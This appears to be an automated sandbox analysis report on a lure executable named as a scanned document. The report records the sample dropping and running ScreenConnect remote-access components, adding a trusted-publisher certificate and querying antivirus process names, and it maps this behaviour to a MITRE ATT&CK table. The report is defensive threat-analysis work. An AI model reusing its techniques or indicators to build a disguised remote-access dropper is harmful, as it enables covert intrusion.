Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe

Code function: 12_2_00007FFD9B873642 CreateNamedPipeW,

12_2_00007FFD9B873642

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Code function: 0_2_005E1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_005E1806

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe

Code function: 11_2_01CE4C62 RtlGetVersion,

11_2_01CE4C62

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Adds / modifies Windows certificates

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Remote Access Functionality

Yara detected ScreenConnect Tool

Source: Yara match	File source: 9.0.ScreenConnect.WindowsClient.exe.100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfsvc.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Obfuscated Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Valid Accounts	1 Valid Accounts	1 Install Root Certificate	Security Account Manager	66 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	2 Windows Service	1 Access Token Manipulation	1 Timestomp	NTDS	71 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Scheduled Task/Job	2 Windows Service	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Bootkit	13 Process Injection	1 DLL Search Order Hijacking	Cached Domain Credentials	71 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	111 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	71 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	13 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Users	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	1 Bootkit	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Scan_doc_09_16_24_1203.exe	16%	ReversingLabs
Scan_doc_09_16_24_1203.exe	14%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
cloudfiles-secure.io	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2.C:	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
